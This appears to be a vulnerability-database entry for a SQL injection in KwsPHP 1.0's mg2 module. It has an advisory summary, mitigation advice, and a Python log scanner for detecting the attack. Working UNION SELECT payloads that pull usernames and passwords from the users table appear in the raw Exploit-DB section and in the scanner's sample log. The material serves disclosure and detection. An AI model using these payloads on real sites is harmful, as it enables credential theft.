Vendor: KwsPHP
By: xoron
CVSS: 7.5 HIGH
Remote SQL Injection
CWE: 89
Product Name: KwsPHP
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:kwsphp:kwsphp:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit

The mg2 module of KwsPHP 1.0 is vulnerable to remote SQL injection through the 'album' parameter passed to 'index.php'. By manipulating that parameter, an attacker can retrieve sensitive information from the 'users' table, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to apply a patch or update to a secure version of KwsPHP. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
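
An added example (not from the original advisory or from KwsPHP): a Python access-log check built on the input-validation advice above. It assumes 'album' is legitimately a non-negative integer and that requests are logged in Apache combined format; the log lines are constructed, and the comment stripping also covers URL-encoded and UNION ALL variants beyond the two requests listed in the raw data below.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# SQL block comments (including an unterminated trailing "/*") stand in for
# whitespace in this kind of request, so they become spaces before matching.
_COMMENT = re.compile(r"/\*.*?(\*/|$)", re.S)
_UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b")
_REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Lower-case, replace SQL comments with spaces, collapse whitespace."""
    value = _COMMENT.sub(" ", value.lower())
    return re.sub(r"\s+", " ", value).strip()

def check_request(url):
    """Return 'ok', 'invalid-album' or 'sqli-union' for one request URL."""
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    if params.get("mod") != "mg2" or "album" not in params:
        return "ok"  # not a request to the affected module
    album = params["album"]
    if re.fullmatch(r"\d{1,10}", album):  # assumption: album is a numeric id
        return "ok"
    if _UNION_SELECT.search(normalize(album)):
        return "sqli-union"
    return "invalid-album"

def scan(lines):
    """Return (client_ip, verdict) for every log line that is not 'ok'."""
    hits = []
    for line in lines:
        m = _REQUEST.match(line)
        if m and (verdict := check_request(m.group(2))) != "ok":
            hits.append((m.group(1), verdict))
    return hits

# Constructed log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Oct/2007:10:00:01 +0000] "GET /index.php?mod=mg2&album=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Oct/2007:10:00:05 +0000] "GET /index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/* HTTP/1.1" 200 4301',
    '198.51.100.7 - - [13/Oct/2007:10:00:09 +0000] "GET /index.php?mod=mg2&album=1%2F**%2FUNION+ALL+SELECT+1 HTTP/1.1" 200 4302',
    '203.0.113.5 - - [13/Oct/2007:10:01:00 +0000] "GET /index.php?mod=mg2&album=abc HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

The same integer-only rule used in check_request is the validation the application should enforce on 'album' before the value reaches any query.
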
Source

Exploit-DB raw data:

--------------------

KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit

--------------------

Found : xoron

--------------------

Exploit:

Name:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/*

Pass:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pass,3,4,5/**/from/**/users/**/where/**/id=1/*

--------------------

From now on always alone, always one, xoron..!

--------------------

# milw0rm.com [2007-10-13]